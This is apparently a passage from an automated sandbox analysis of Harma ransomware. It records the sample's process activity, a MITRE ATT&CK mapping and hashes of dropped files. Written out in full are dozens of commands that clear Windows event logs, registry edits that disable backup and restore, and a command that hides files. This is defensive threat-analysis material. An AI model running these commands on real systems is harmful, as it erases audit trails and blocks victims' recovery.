C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ADSI/Debug"
1⤵
PID:3368

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Operational"
1⤵
PID:4144

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-AAD/Analytic"
1⤵
PID:4428
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Server /v NoRunNowBackup /t REG_DWORD /d 1 /f
  2⤵
  PID:3368

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Operational"
1⤵
PID:1876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Debug"
1⤵
PID:3924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-SQM Uploader/Analytic"
1⤵
PID:212

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-IPC/Operational"
1⤵
PID:3680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-App Agent/Debug"
1⤵
PID:4716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Operational"
1⤵
PID:456

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Agent Driver/Debug"
1⤵
PID:2280

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-User Experience Virtualization-Admin/Debug"
1⤵
PID:1444

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-PerfTrack-IEFRAME/Diagnostic"
1⤵
- Clears Windows event logs
PID:1088

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-OneCore-Setup/Analytic"
1⤵
PID:4080

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Diagnostic"
1⤵
PID:2400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Debug"
1⤵
PID:2648

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Client-Licensing-Platform/Admin"
1⤵
PID:2260

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-SharedPerformance/Analytic"
1⤵
PID:100

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Virtual Applications"
1⤵
PID:2440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Operational"
1⤵
PID:2680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client/Admin"
1⤵
PID:952

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-AppV-Client-Streamingux/Debug"
1⤵
PID:2748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationSrcPrefetch"
1⤵
PID:3736

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationPipeline"
1⤵
PID:2256

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformanceCore"
1⤵
PID:1668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationPerformance"
1⤵
PID:1872

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationContentProtection"
1⤵
PID:3832

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Diagnostic"
1⤵
PID:920
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupToOptical /t REG_DWORD /d 1 /f
  2⤵
  PID:4692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MediaFoundationAsyncWrapper"
1⤵
PID:5020
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v NoLogoff /t REG_DWORD /d 1 /f
  2⤵
  PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProcD3D"
1⤵
PID:2976

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MedaFoundationVideoProc"
1⤵
PID:1292

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationFrameServer"
1⤵
PID:3120

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceProxy"
1⤵
PID:1396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Diagnostic"
1⤵
PID:2844

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Kernel-Power/Thermal-Operational"
1⤵
PID:4388
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableRestoreUI /t REG_DWORD /d 1 /f
  2⤵
  PID:4104

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "MF_MediaFoundationDeviceMFT"
1⤵
PID:4616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Key Management Service"
1⤵
PID:4668
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v HideSCAHealth /t REG_DWORD /d 1 /f
  2⤵
  PID:3568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Performance"
1⤵
PID:844

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-I2C/Debug"
1⤵
PID:4576

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Performance"
1⤵
PID:3440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS2-GPIO2/Debug"
1⤵
PID:3424

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Intel-iaLPSS-GPIO/Analytic"
1⤵
PID:1420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "HardwareEvents"
1⤵
- Clears Windows event logs
PID:1332

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "General Logging"
1⤵
PID:396
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoNetworkConnections /t REG_DWORD /d 1 /f
  2⤵
  PID:2796

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "ForwardedEvents"
1⤵
PID:2796

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "EndpointMapper"
1⤵
PID:1112

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Els_Hyphenation/Analytic"
1⤵
PID:4060
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoStartMenuMorePrograms /t REG_DWORD /d 1 /f
  2⤵
  PID:3640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "DirectShowFilterGraph"
1⤵
PID:2040
- C:\Windows\SysWOW64\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoSearchProgramsInStartMenu /t REG_DWORD /d 1 /f
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4392

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Application"
1⤵
PID:4392

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "AirSpaceChannel"
1⤵
PID:4556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "AMSI/Debug"
1⤵
- Clears Windows event logs
PID:928

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c wevtutil.exe el
1⤵
PID:1188

C:\Windows\SysWOW64\reg.exe
reg add HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Backup\Client /v DisableBackupLauncher /t REG_DWORD /d 1 /f
1⤵
PID:5060

C:\Windows\SysWOW64\attrib.exe
attrib +h +s C:\ProgramData\HRMPUB
1⤵
- Suspicious use of AdjustPrivilegeToken
- Views/modifies file attributes
PID:3184

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Indicator Removal

T1070

File Deletion

T1070.004

Credential Access

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\HRMPRIV

Filesize
2KB

MD5
5a578a1d64ee8a47cd1fcb54e349e054

SHA1
cf06a6214bc3bc838319ceb8d97ce4873ee5eb29

SHA256
4f03b23c3262da7df82128161990389ba2d6f74102a76162b92f075191553cf2

SHA512
dc765a66377d373b120302a9e1025857f5f441dc0eef143865d72c50a77c52b68d2d2fa95560a69841d07f35b625576fce3801cbde839db70a2a364f4968a87f

Download Submit
C:\ProgramData\harma.exe

Filesize
913KB

MD5
30e1234ef3e570667526fdb006832b12

SHA1
01de8ba945945b58824f69553ac0f7b048645d45

SHA256
72ea5a2972634a78b4808d2164517dc8dbed4eef24d05d135dbe537e05208bf2

SHA512
00bd673f43cba1b16363433e672b30d22196fa0b67c024f970da15270323e545d15b3b990ed1dbbc3e7b9421c3f7840b10621c76203f89e0bcb1214e2a129e4e

Download Submit
C:\ProgramData\id.harma

Filesize
8B

MD5
d52a34c75dadc241395c9589964794fe

SHA1
3afcc9640e49ed00fedf026beb065685741af5b3

SHA256
24a5c1ebaf6bbabb24a44ac416e1dcb6364168c53a63ef725011e67b004c3e92

SHA512
224cf2db348e54d303eaa7f52f9175fdc41da612491f573ea5f3cd43a3f40c198111fe525f32bd95ae0b556cb9cfccf93d54b81651166a5c60033f1a06a5bf55

Download Submit
C:\Users\Admin\AppData\Local\Temp\HRMPUB

Filesize
292B

MD5
67a2f94926e5ae08b5362dd3d7a6abe3

SHA1
a7a343b3232493dd90e1f727454cc3fea121a154

SHA256
05ac2137b115519ae95675c42b107b18579a139e253a2540d9b80528fb023ffa

SHA512
6d886797935e125fa60e7fc63930b55bbe840cf6999c6ba6a57e0c9416f05a39b82d5f464ec0ba0ad2663bb3df80c74ace37ce8d3f99aa66c153540bcafbc905

Download Submit
memory/544-7983-0x0000000076442000-0x0000000076443000-memory.dmp

Filesize
4KB

Download